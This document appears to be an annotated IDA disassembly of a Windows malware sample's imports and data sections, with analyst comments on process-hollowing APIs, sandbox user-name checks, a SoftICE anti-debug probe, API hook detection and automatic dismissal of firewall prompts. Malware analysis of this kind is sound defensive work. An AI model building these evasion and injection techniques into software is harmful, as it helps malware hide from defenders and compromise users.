; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) extrn VirtualAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+7Ep ; ___sbh_alloc_new_group+52p ... ; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes) extrn HeapReAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+27p ; _realloc+FDp ... ; void __stdcall ExitProcess(UINT uExitCode) extrn ExitProcess:dword ; CODE XREF: unknown_libname_1+29p ; sub_404305-7p ; DATA XREF: ... ; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName) extrn GetProcAddress:dword ; CODE XREF: sub_401000+3Bp ; sub_401000+46p ... ; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped) extrn WriteFile:dword ; CODE XREF: __NMSG_WRITE+155p ; DATA XREF: __NMSG_WRITE+155r ; HANDLE __stdcall GetStdHandle(DWORD nStdHandle) extrn GetStdHandle:dword ; CODE XREF: __NMSG_WRITE+14Ep ; __ioinit+157p ; DATA XREF: ... 
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo) extrn UnhandledExceptionFilter:dword ; CODE XREF: __XcptFilter+167p ; DATA XREF: __XcptFilter+167r ; BOOL __stdcall FreeEnvironmentStringsA(LPCH) extrn FreeEnvironmentStringsA:dword ; CODE XREF: ___crtGetEnvironmentStringsA+113p ; DATA XREF: ___crtGetEnvironmentStringsA+113r ; LPCH __stdcall GetEnvironmentStrings() extrn GetEnvironmentStrings:dword ; CODE XREF: ___crtGetEnvironmentStringsA:loc_40378Cp ; DATA XREF: ___crtGetEnvironmentStringsA:loc_40378Cr ; BOOL __stdcall FreeEnvironmentStringsW(LPWCH) extrn FreeEnvironmentStringsW:dword ; CODE XREF: ___crtGetEnvironmentStringsA+C1p ; DATA XREF: ___crtGetEnvironmentStringsA+C1r ; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar) extrn WideCharToMultiByte:dword ; CODE XREF: ___crtGetEnvironmentStringsA+86p ; ___crtGetEnvironmentStringsA+A8p ... ; DWORD __stdcall GetLastError() extrn GetLastError:dword ; CODE XREF: ___crtGetEnvironmentStringsA:loc_4036E5p ; ___crtLCMapStringA:loc_404E10p ... ; LPWCH __stdcall GetEnvironmentStringsW() extrn GetEnvironmentStringsW:dword ; CODE XREF: ___crtGetEnvironmentStringsA+1Cp ; ___crtGetEnvironmentStringsA+52p ; DATA XREF: ... ; UINT __stdcall SetHandleCount(UINT uNumber) extrn SetHandleCount:dword ; CODE XREF: __ioinit+19Cp ; DATA XREF: __ioinit+19Cr ; DWORD __stdcall GetFileType(HANDLE hFile) extrn GetFileType:dword ; CODE XREF: __ioinit+FEp ; __ioinit+165p ; DATA XREF: ... ; UINT __stdcall GetACP() extrn GetACP:dword ; CODE XREF: __setmbcp+42p ; DATA XREF: __setmbcp+42r ; UINT __stdcall GetOEMCP() extrn GetOEMCP:dword ; CODE XREF: __setmbcp+2Bp ; DATA XREF: __setmbcp+2Br ; BOOL __stdcall GetCPInfo(UINT CodePage, LPCPINFO lpCPInfo) extrn GetCPInfo:dword ; CODE XREF: _setSBUpLow+1Cp ; __setmbcp+93p ... 
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwindr ; LONG __stdcall InterlockedExchange(volatile LONG *Target, LONG Value) extrn InterlockedExchange:dword ; CODE XREF: __ValidateEH3RN+131p ; __ValidateEH3RN+196p ... ; SIZE_T __stdcall VirtualQuery(LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength) extrn VirtualQuery:dword ; CODE XREF: __ValidateEH3RN+B3p ; __resetstkoflw+1Ap ... ; SIZE_T __stdcall HeapSize(HANDLE hHeap, DWORD dwFlags, LPCVOID lpMem) extrn HeapSize:dword ; CODE XREF: __msize+30p ; DATA XREF: __msize+30r ; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount) extrn QueryPerformanceCounter:dword ; CODE XREF: ___security_init_cookie+43p ; DATA XREF: ___security_init_cookie+43r ; DWORD __stdcall GetTickCount() extrn GetTickCount:dword ; CODE XREF: ___security_init_cookie+37p ; DATA XREF: ___security_init_cookie+37r ; DWORD __stdcall GetCurrentThreadId() extrn GetCurrentThreadId:dword ; CODE XREF: ___security_init_cookie+2Fp ; DATA XREF: ___security_init_cookie+2Fr ; DWORD __stdcall GetCurrentProcessId() extrn GetCurrentProcessId:dword ; CODE XREF: ___security_init_cookie+27p ; DATA XREF: ___security_init_cookie+27r ; void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime) extrn GetSystemTimeAsFileTime:dword ; CODE XREF: ___security_init_cookie+1Bp ; DATA XREF: ___security_init_cookie+1Br ; int __stdcall LCMapStringA(LCID Locale, DWORD dwMapFlags, LPCSTR lpSrcStr, int cchSrc, LPSTR lpDestStr, int cchDest) extrn LCMapStringA:dword ; CODE XREF: ___crtLCMapStringA+2C3p ; ___crtLCMapStringA+344p ... ; int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar) extrn MultiByteToWideChar:dword ; CODE XREF: ___crtLCMapStringA+C0p ; ___crtLCMapStringA+141p ... 
; int __stdcall LCMapStringW(LCID Locale, DWORD dwMapFlags, LPCWSTR lpSrcStr, int cchSrc, LPWSTR lpDestStr, int cchDest) extrn LCMapStringW:dword ; CODE XREF: ___crtLCMapStringA+27p ; ___crtLCMapStringA+15Bp ... ; BOOL __stdcall GetStringTypeA(LCID Locale, DWORD dwInfoType, LPCSTR lpSrcStr, int cchSrc, LPWORD lpCharType) extrn GetStringTypeA:dword ; CODE XREF: ___crtGetStringTypeA+19Cp ; DATA XREF: ___crtGetStringTypeA+19Cr ; BOOL __stdcall GetStringTypeW(DWORD dwInfoType, LPCWSTR lpSrcStr, int cchSrc, LPWORD lpCharType) extrn GetStringTypeW:dword ; CODE XREF: ___crtGetStringTypeA+24p ; ___crtGetStringTypeA+128p ; DATA XREF: ... ; int __stdcall GetLocaleInfoA(LCID Locale, LCTYPE LCType, LPSTR lpLCData, int cchData) extrn GetLocaleInfoA:dword ; CODE XREF: ___ansicp+20p ; DATA XREF: ___ansicp+20r ; BOOL __stdcall VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect) extrn VirtualProtect:dword ; CODE XREF: __resetstkoflw+D5p ; DATA XREF: __resetstkoflw+D5r ; void __stdcall GetSystemInfo(LPSYSTEM_INFO lpSystemInfo) extrn GetSystemInfo:dword ; CODE XREF: __resetstkoflw+2Bp ; DATA XREF: __resetstkoflw+2Br ; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode) extrn TerminateProcess:dword ; CODE XREF: _doexit+1Ap ; DATA XREF: _doexit+1Ar ; BOOL __stdcall FreeLibrary(HMODULE hLibModule) extrn FreeLibrary:dword ; CODE XREF: sub_401000+78p ; DATA XREF: sub_401000+78r ; ; Imports from USER32.dll ; ; HWND __stdcall FindWindowA(LPCSTR lpClassName, LPCSTR lpWindowName) extrn FindWindowA:dword ; CODE XREF: StartAddress+12p ; StartAddress+23p ; DATA XREF: ... 
; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) extrn MessageBoxA:dword ; CODE XREF: sub_401613+8Ep ; DATA XREF: sub_401613+8Er ; LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam) extrn SendMessageA:dword ; CODE XREF: StartAddress+35p ; DATA XREF: StartAddress+35r ; BOOL __stdcall IsWindow(HWND hWnd) extrn IsWindow:dword ; CODE XREF: StartAddress+48p ; DATA XREF: StartAddress+3Br ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read _rdata segment para public 'DATA' use32 assume cs:_rdata ;org 40611Ch align 10h ; char aRtlgetcompress[] aRtlgetcompress db 'RtlGetCompressionWorkSpaceSize',0 ; DATA XREF: sub_401000+3Do align 10h ; char ProcName[] ProcName db 'RtlDecompressBuffer',0 ; DATA XREF: sub_401000+35o ; char LibFileName[] LibFileName db 'ntdll.dll',0 ; DATA XREF: sub_401000+1Do ; sub_405892+5o align 10h ; char Text[] Text db 'mnbbntrew t regfsdhfiasjdkfjasopdifisduifyhsdufyhasuidhfuiasdyfyu' ; DATA XREF: sub_401613+87o db ' sdyufsyudagfyu asgdf asdf asdg sfdg sfdgspdifisduifyhsdufyhasuid' db 'hfuiasdyfyu sdyufsyudagfyu asgdf asdf asdg sfdg sfdgspdifisduifyh' db 'sdufyhasuidhfuiasdyfyu sdyufsyudagfyu asgdf asdf asdg sfdg sfdgs',0 align 8 ; char Caption[] Caption db 'f78ret64375u435r q43tr67fstgdyfsew6r65fsdr65fasybfj5u435r q43tr67' ; DATA XREF: sub_401613+82o db 'fstgdyfsew6r65fsdr65fasybfj5u435r q43tr67fstgdyfsew6r65fsdr65fasy' db 'bfjasgsfdhgfdjhgfd',0 align 10h ; char ModuleName[] ModuleName db 'kernel32.dll',0 ; DATA XREF: sub_4016EE+DDo ; WinMain(x,x,x,x)+81o ... 
align 10h
; char aWriteprocessme[]
; Looked up by name via GetProcAddress in sub_4016EE and again in WinMain;
; WriteProcessMemory is not a static import of this binary.
aWriteprocessme db 'WriteProcessMemory',0 ; DATA XREF: sub_4016EE+D8o
; WinMain(x,x,x,x)+11Fo
align 4
; char a689ytS78eyg67b[]
; Two opaque strings referenced only from sub_401881, the routine that opens
; a file (CreateFileA / GetFileSize / ReadFile) and hands the contents to the
; RtlDecompressBuffer wrapper sub_401000.  NOTE(review): whether they are a
; file name, a marker or key material is not visible in this listing --
; confirm in sub_401881 before labelling them.
a689ytS78eyg67b db '689yt s78eyg67bsdf67tewa78ytijn4qhkte',0 ; DATA XREF: sub_401881+D3o
align 4
; char a6897u546gfd78u[]
a6897u546gfd78u db '6897u546gfd78ui54wn8 gtrewyt rewy tre54',0 ; DATA XREF: sub_401881+B0o
; char aCurrentuser[]
; sub_40196F calls GetUserNameA and lstrcmpA's the result against "USER" and
; "CurrentUser".  Both are default account names used by well-known
; automated sandboxes, so this is presumably an analysis-environment check;
; verify how the caller acts on the result.
aCurrentuser db 'CurrentUser',0 ; DATA XREF: sub_40196F+47o
; char String1[]
String1 db 'USER',0 ; DATA XREF: sub_40196F+38o
align 4
; char FileName[]
; sub_4019CA opens this device name with CreateFileA and then CloseHandle's
; it.  \\.\NTICE is the device exposed by the SoftICE kernel debugger, so a
; successful open presumably means "debugger installed" (classic anti-debug
; probe).  Confirm what sub_4019CA's caller does with the outcome.
FileName db '\\.\NTICE',0 ; DATA XREF: sub_4019CA+12o
align 4
; char aKernel32_dll_0[]
; sub_4019FA: GetModuleHandleA("KERNEL32.dll"), then (presumably via
; GetProcAddress) "CreateProcessA", followed by ReadProcessMemory on
; GetCurrentProcess().  Reading the first bytes of an API inside its own
; process is the usual way to detect an inline hook placed by a user-mode
; sandbox/AV -- NOTE(review): inferred from the XREFs alone, verify.
aKernel32_dll_0 db 'KERNEL32.dll',0 ; DATA XREF: sub_4019FA+Ao
align 4
; char aCreateprocessa[]
aCreateprocessa db 'CreateProcessA',0 ; DATA XREF: sub_4019FA+5o
align 4
; char WindowName[]
; The worker thread StartAddress (created in WinMain via CreateThread) calls
; FindWindowA for this title, Sleeps, looks again, then SendMessageA's to the
; window while IsWindow holds.  "Windows Security Alert" is the title of the
; Windows Firewall "allow/block" prompt, so the thread presumably clicks it
; away automatically -- check the message and wParam used in StartAddress.
WindowName db 'Windows Security Alert',0 ; DATA XREF: StartAddress+Ao
align 4
; char aVirtualalloc[]
; Resolved by name in WinMain (GetModuleHandleA("kernel32.dll") at +81 and
; GetProcAddress), even though VirtualAlloc is also a static import used by
; the CRT small-block heap.
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: WinMain(x,x,x,x)+7Co
align 4
; char aReadprocessmem[]
; The next three names are resolved by the initialiser stubs sub_405858 /
; sub_405875 / sub_405892 into dword_4362C4 / dword_4362CC / dword_4362C8.
; SetThreadContext and NtUnmapViewOfSection are not static imports; with
; CreateProcessA, GetThreadContext, VirtualAllocEx, WriteProcessMemory and
; ResumeThread this is the canonical process-hollowing API set.
aReadprocessmem db 'ReadProcessMemory',0 ; DATA XREF: sub_405858o
align 10h
; char aSetthreadconte[]
aSetthreadconte db 'SetThreadContext',0 ; DATA XREF: sub_405875o
align 4
; char aNtunmapviewofs[]
aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_405892o
align 10h
; const CHAR stru_406420
; SEH scope table of the CRT entry point (registered at start+2).
stru_406420 _msEH <0FFFFFFFFh, offset loc_4022E4, offset loc_4022F8> ; DATA XREF: start+2o
; char aCorexitprocess[]
; CRT shutdown helper: unknown_libname_1 looks up mscoree!CorExitProcess
; and otherwise calls ExitProcess.  Library code, not injector logic.
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+Fo
align 4
; char aMscoree_dll[]
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1o
; CRT run-time error message fragments (R60xx table at off_408064, printed
; by __NMSG_WRITE).  Standard library data; nothing sample-specific below.
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s 
support team for more informa' db 'tion.',0Dh,0Ah,0 align 4 aR6028UnableToI db 'R6028',0Dh,0Ah db '- unable to initialize heap',0Dh,0Ah,0 align 4 aR6027NotEnough db 'R6027',0Dh,0Ah db '- not enough space for lowio initialization',0Dh,0Ah,0 align 4 aR6026NotEnough db 'R6026',0Dh,0Ah db '- not enough space for stdio initialization',0Dh,0Ah,0 align 4 aR6025PureVirtu db 'R6025',0Dh,0Ah db '- pure virtual function call',0Dh,0Ah,0 align 4 aR6024NotEnough db 'R6024',0Dh,0Ah db '- not enough space for _onexit/atexit table',0Dh,0Ah,0 align 4 aR6019UnableToO db 'R6019',0Dh,0Ah db '- unable to open console device',0Dh,0Ah,0 align 4 aR6018Unexpecte db 'R6018',0Dh,0Ah db '- unexpected heap error',0Dh,0Ah,0 align 4 aR6017Unexpecte db 'R6017',0Dh,0Ah db '- unexpected multithread lock error',0Dh,0Ah,0 align 4 aR6016NotEnough db 'R6016',0Dh,0Ah db '- not enough space for thread data',0Dh,0Ah,0 aThisApplicatio db 0Dh,0Ah db 'This application has requested the Runtime to terminate it in an ' db 'unusual way.',0Ah db 'Please contact the application',27h,'s support team for more informa' db 'tion.',0Dh,0Ah,0 align 10h aR6009NotEnough db 'R6009',0Dh,0Ah db '- not enough space for environment',0Dh,0Ah,0 aR6008NotEnough db 'R6008',0Dh,0Ah db '- not enough space for arguments',0Dh,0Ah,0 align 4 aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_408064o db '- floating point not loaded',0Dh,0Ah,0 align 10h aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123o ; ___security_error_handler+132o align 4 ; char asc_406818[] asc_406818 db 0Ah ; DATA XREF: __NMSG_WRITE+107o ; ___security_error_handler+FCo db 0Ah,0 align 4 ; char aRuntimeErrorPr[] aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5o db 0Ah db 'Program: ',0 align 4 ; char a___[] a___ db '...',0 ; DATA XREF: __NMSG_WRITE+C1o ; ___security_error_handler+CCo ; char aProgramNameUnk[] aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8Eo ; 
___security_error_handler+8Bo byte_406853 db 0 ; DATA XREF: __wincmdln+1Bo align 8 stru_406858 _msEH <0FFFFFFFFh, offset loc_4039AF, offset loc_4039B3> ; DATA XREF: sub_403982+2o align 8 stru_406868 _msEH <0FFFFFFFFh, offset loc_4039F3, offset loc_4039F7> ; DATA XREF: sub_4039C6+2o ; char aGetprocesswind[] aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73o ; char aGetuserobjecti[] aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62o align 4 ; char aGetlastactivep[] aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47o align 4 ; char aGetactivewindo[] aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3Fo ; char aMessageboxa[] aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2Eo ; char aUser32_dll[] aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13o align 8 stru_4068E8 _msEH <0FFFFFFFFh, offset sub_4042F1, offset sub_4042F5> ; DATA XREF: sub_404305-2Fo ; char aProgram[] aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108o align 10h aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra' ; DATA XREF: ___security_error_handler+62o db 'm',27h,'s',0Ah db 'internal state. The program cannot safely continue execution and' db ' must',0Ah db 'now be terminated.',0Ah,0 aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: ___security_error_handler:loc_404CECo align 10h aASecurityError db 'A security error of unknown cause has been detected which has',0Ah ; DATA XREF: ___security_error_handler+4Co db 'corrupted the program',27h,'s internal state. 
The program cannot sa' db 'fely',0Ah db 'continue execution and must now be terminated.',0Ah,0 align 4 ; char aUnknownSecurit[] aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: ___security_error_handler+47o align 4 stru_406A98 _msEH <0FFFFFFFFh, offset loc_404CC7, offset loc_404CCB> ; DATA XREF: ___security_error_handler+5o dd 41h dup(0) asc_406BA8: ; DATA XREF: .data:off_4082A0o unicode 0, < ((((( H> dw 10h dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h) dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h dd 100010h, 200010h, 40h dup(0) dword_406DA8 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h ; DATA XREF: .data:004082A4o dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h) dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h) dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h) dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h) dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h) dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h) dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h ; const WCHAR SrcStr SrcStr dw 0 ; DATA XREF: ___crtLCMapStringA+1Co ; ___crtGetStringTypeA+1Eo align 10h stru_406FB0 _msEH <0FFFFFFFFh, offset loc_4050D0, offset loc_4050D4> ; DATA XREF: ___crtLCMapStringA+2o dd 0FFFFFFFFh, 404ECDh, 404ED1h, 0FFFFFFFFh, 404F9Bh, 404F9Fh dd 0 stru_406FD8 _msEH <0FFFFFFFFh, offset loc_40526C, offset loc_405270> ; DATA XREF: ___crtGetStringTypeA+2o align 8 stru_406FE8 _msEH <0FFFFFFFFh, offset loc_405462, offset loc_405466> ; DATA XREF: ___convertcp+2o align 8 dd 48h, 0Eh dup(0) dd offset dword_408190 dd offset dword_407040 dd 2 dword_407040 dd 3A60h, 4798h, 0dword_40704C dd 2 dup(0) ; sub_403982:loc_403995o dword_407054 dd 0 ; sub_4039C6:loc_4039D9o dd 70B0h, 2 dup(0) dd 7620h, 6008h, 71B4h, 2 dup(0) dd 7666h, 610Ch, 70A8h, 2 dup(0) dd 7682h, 6000h, 5 dup(0) dd 7672h, 0 dd 71E8h, 71F8h, 
720Ah, 721Eh, 7230h, 7244h, 7258h, 726Ah dd 727Ah, 7286h, 7294h, 72A2h, 72AEh, 72BCh, 72D0h, 72E4h dd 72ECh, 7302h, 7312h, 7328h, 7334h, 7346h, 7358h, 7368h dd 7376h, 7384h, 7392h, 739Eh, 73AEh, 73BCh, 71D6h, 73DEh dd 73EAh, 73FAh, 7416h, 7430h, 7448h, 7462h, 7478h, 7488h dd 74A2h, 74B4h, 74C2h, 74CCh, 74D8h, 74E4h, 74F0h, 7506h dd 7516h, 7522h, 753Ch, 754Ch, 7562h, 7578h, 7592h, 75A2h dd 75B8h, 75C8h, 75DAh, 75ECh, 75FEh, 7610h, 73CAh, 71C8h dd 0 dd 7658h, 762Eh, 7648h, 763Ch, 0 db 0EFh ; ï align 2 aFreelibrary db 'FreeLibrary',0 dw 198h aGetprocaddress db 'GetProcAddress',0 align 4 db 48h ; H db 2, 4Ch, 6Fh aAdlibrarya db 'adLibraryA',0 align 4 db 7Ch ; | db 3, 56h, 69h aRtualqueryex db 'rtualQueryEx',0 align 2 dw 1CDh aGetthreadconte db 'GetThreadContext',0 align 2 db '`',0 aCreateproces_0 db 'CreateProcessA',0 align 10h db 77h ; w db 1, 47h, 65h aTmodulehandlea db 'tModuleHandleA',0 align 4 db 7Ah ; z db 3, 56h, 69h aRtualprotectex db 'rtualProtectEx',0 align 4 db 74h ; t db 3, 56h, 69h aRtualallocex db 'rtualAllocEx',0 align 2 dw 2C5h aResumethread db 'ResumeThread',0 align 2 dw 2A9h aReadfile db 'ReadFile',0 align 2 dw 15Bh aGetfilesize db 'GetFileSize',0 aM db 'M',0 aCreatefilea db 'CreateFileA',0 dw 3B0h aLstrcmpa db 'lstrcmpA',0 align 2 a_ db '.',0 aClosehandle db 'CloseHandle',0 db 0ACh ; ¬ db 2, 52h, 65h aAdprocessmemor db 'adProcessMemory',0 db 3Ah ; : db 1, 47h, 65h aTcurrentproces db 'tCurrentProcess',0 db 47h ; G db 3, 53h, 6Ch db 65h ; e db 65h, 70h, 0 db 0Ch db 3, 53h, 65h aTfileattribute db 'tFileAttributesA',0 align 2 aI db 'i',0 aCreatethread db 'CreateThread',0 align 2 dw 175h aGetmodulefilen db 'GetModuleFileNameA',0 align 4 dd 65480206h, 6C417061h, 636F6Ch, 654701AFh, 61745374h dd 70757472h, 6F666E49h, 1080041h, 43746547h, 616D6D6Fh dd 694C646Eh, 41656Eh, 654701DFh, 72655674h, 6E6F6973h dd 417845h, 6548020Ah, 65447061h, 6F727473h, 2080079h dd 70616548h, 61657243h, 6574h, 69560376h, 61757472h, 6572466Ch dd 20C0065h, 70616548h, 65657246h, 
3730000h, 74726956h dd 416C6175h, 636F6C6Ch, 2100000h, 70616548h, 6C416552h dd 636F6Ch, 784500AFh, 72507469h, 7365636Fh, 34F0073h dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 3940000h dd 74697257h, 6C694665h, 1B10065h, 53746547h, 61486474h dd 656C646Eh, 3600000h aUnhandledexcep db 'UnhandledExceptionFilter',0 align 2 aA db 'í',0 aFreeenvironmen db 'FreeEnvironmentStringsA',0 db 4Dh ; M db 1, 47h, 65h aTenvironmentst db 'tEnvironmentStrings',0 aU db 'î',0 aFreeenvironm_0 db 'FreeEnvironmentStringsW',0 dw 387h aWidechartomult db 'WideCharToMultiByte',0 db 69h ; i db 1, 47h, 65h aTlasterror db 'tLastError',0 align 4 db 4Fh ; O db 1, 47h, 65h aTenvironment_0 db 'tEnvironmentStringsW',0 align 2 dw 317h aSethandlecount db 'SetHandleCount',0 align 4 db 5Eh ; ^ db 1, 47h, 65h aTfiletype db 'tFileType',0 dw 0F5h aGetacp db 'GetACP',0 align 4 db 8Bh ; ‹ db 1, 47h, 65h aToemcp db 'tOEMCP',0 align 4 db 0FCh ; ü align 2 aGetcpinfo db 'GetCPInfo',0 db 0CAh ; Ê db 2, 52h, 74h aLunwind db 'lUnwind',0 db 1Fh db 2, 49h, 6Eh aTerlockedexcha db 'terlockedExchange',0 dw 37Bh aVirtualquery db 'VirtualQuery',0 align 2 dw 212h aHeapsize db 'HeapSize',0 align 2 dw 297h aQueryperforman db 'QueryPerformanceCounter',0 db 0D5h ; Õ db 1, 47h, 65h aTtickcount db 'tTickCount',0 align 4 db 3Eh ; > db 1, 47h, 65h aTcurrentthread db 'tCurrentThreadId',0 align 2 dw 13Bh aGetcurrentproc db 'GetCurrentProcessId',0 db 0C0h ; À db 1, 47h, 65h aTsystemtimeasf db 'tSystemTimeAsFileTime',0 dw 23Ah aLcmapstringa db 'LCMapStringA',0 align 2 dw 26Bh aMultibytetowid db 'MultiByteToWideChar',0 dd 434C023Bh, 5370614Dh, 6E697274h, 5767h, 654701B2h, 72745374h dd 54676E69h, 41657079h, 1B50000h, 53746547h, 6E697274h dd 70795467h, 5765h, 6547016Ch, 636F4C74h, 49656C61h, 416F666Eh dd 3790000h, 74726956h, 506C6175h, 65746F72h, 7463h, 654701BBh dd 73795374h, 496D6574h, 6F666Eh, 4E52454Bh, 32334C45h dd 6C6C642Eh, 1DE0000h, 7373654Dh, 42656761h, 41786Fh dd 734901ADh, 646E6957h, 776Fh, 6553023Bh, 654D646Eh, 67617373h dd 
4165h, 694600E3h, 6957646Eh, 776F646Eh, 53550041h, 32335245h dd 6C6C642Eh, 1230000h, 55746547h, 4E726573h, 41656D61h dd 44410000h, 49504156h, 642E3233h, 6C6Ch, 5Ch dup(0) _rdata ends ; Section 3. (virtual address 00008000) ; Virtual size : 0002E87C ( 190588.) ; Section size in file : 00000400 ( 1024.) ; Offset to raw data for section: 00006600 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _data segment para public 'DATA' use32 assume cs:_data ;org 408000h dword_408000 dd 0 dd offset ___security_init_cookie dd offset sub_405858 dd offset sub_405875 dd offset sub_405892 dword_408014 dd 0 dword_408018 dd 0 dd offset ___onexitinit dd offset ___initmbctable dword_408024 dd 0 dword_408028 dd 0 dword_40802C dd 0 dword_408030 dd 0 dword_408034 dd 3 dup(0) dword_408040 dd 6A00h ; sub_4011C8+A1r ... align 10h off_408050 dd offset __exit ; DATA XREF: __amsg_exit+1Cr dword_408054 dd 2 ; __FF_MSGBANNER+Er dd 10h, 0 dword_408060 dd 2 ; __NMSG_WRITE+3Ar off_408064 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5r ; __NMSG_WRITE+112r ... ; "R6002\r\n- floating point not loaded\r\n" dd 8, 40679Ch, 9, 406770h, 0Ah, 4066D8h, 10h, 4066ACh dd 11h, 40667Ch, 12h, 406658h, 13h, 40662Ch, 18h, 4065F4h dd 19h, 4065CCh, 1Ah, 406594h, 1Bh, 40655Ch, 1Ch, 406534h dd 1Dh, 406490h, 78h, 40647Ch, 79h, 40646Ch, 7Ah, 40645Ch dd 0FCh, 406458h, 0FFh, 406448h dword_4080F8 dd 0C0000005h, 0Bh, 0 dd 0C000001Dh, 4, 0 dd 0C0000096h, 4, 0 dd 0C000008Dh, 8, 0 dd 0C000008Eh, 8, 0 dd 0C000008Fh, 8, 0 dd 0C0000090h, 8, 0 dd 0C0000091h, 8, 0 dd 0C0000092h, 8, 0 dd 0C0000093h, 8, 0 dword_408170 dd 3 dword_408174 dd 7 dword_408178 dd 0Ah dword_40817C dd 8Ch ; __XcptFilter+BAw ... dd 0FFFFFFFFh, 0A80h, 2 dup(0) dword_408190 dd 0BB40E64Eh ; sub_404305r ... 
align 8 byte_408198 db 1 ; DATA XREF: __setmbcp+120r db 2, 4, 8 align 10h dword_4081A0 dd 3A4h dword_4081A4 dd 82798260h dd 21h, 0 dword_4081B0 dd 0DFA6h align 8 dd 0A5A1h, 0 dd 0FCE09F81h, 0 dd 0FC807E40h, 0 dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0) dd 0FE81h, 0 dd 0FE40h, 0 dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0) dd 0FE81h, 0 dd 0FE41h, 0 dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0) dd 0FE81h, 0 dd 0FEA17E40h, 0 dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0) dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0 dword_408290 dd 19930520h, 3 dup(0) ; __NLG_Notify+2o off_4082A0 dd offset asc_406BA8 ; DATA XREF: _x_ismbbtype+18r ; __ismbcspace:loc_405791r ... ; " ((((( H" dd offset dword_406DA8+2 dd 1, 0 dword_4082B0 dd 1 dd 2Eh, 1, 0 byte_4082C0 db 0 ; DATA XREF: sub_4011C8+49w ; sub_401425+2Ew ... align 4 dword_4082C4 dd 0 ; sub_4011C8+Er ... ; HANDLE hFile hFile dd 0 ; DATA XREF: sub_401881+23w ; sub_401881+4Cr byte_4082CC db 0 ; DATA XREF: sub_4011C8+1Bw ; sub_4011C8+43w ... align 10h ; HANDLE hThread hThread dd 0 ; DATA XREF: sub_4016EE+150w ; sub_401855r ; struct _MEMORY_BASIC_INFORMATION Buffer Buffer _MEMORY_BASIC_INFORMATION <0> ; DATA XREF: sub_4015FB+4o ; 